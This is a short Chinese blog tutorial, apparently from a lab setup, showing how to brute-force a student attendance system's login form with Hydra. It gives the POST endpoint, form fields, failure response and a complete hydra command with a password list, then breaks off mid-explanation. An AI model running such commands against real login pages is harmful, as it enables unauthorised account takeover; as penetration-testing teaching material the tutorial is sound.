九头蛇hydra爆破http示例

九头蛇hydra爆破http示例

使用hydra执行http表单暴力破解

通过浏览器自带分析得知:

提交地址:http://10.0.0.115/student_attendance/ajax.php?action=login

提交方式:POST

提交数据:username=a&password=a

服务响应:3

九头蛇hydra爆破http示例
九头蛇hydra爆破http示例
九头蛇hydra爆破http示例

根据以上收集的信息就可以使用hydra进行密码爆破

hydra 10.0.0.115 http-form-post “/student_attendance/ajax.php?action=login:username=^USER^&password=^PASS^:\r\n\r\n3” -ladmin -P MidPwds.txt -vV -f

参数说明

10.0.0.115 目标主机地址
http-form-post POST提交方

                       

点击阅读全文

上一篇 2023年 6月 5日 am10:30
下一篇 2023年 6月 5日 am10:31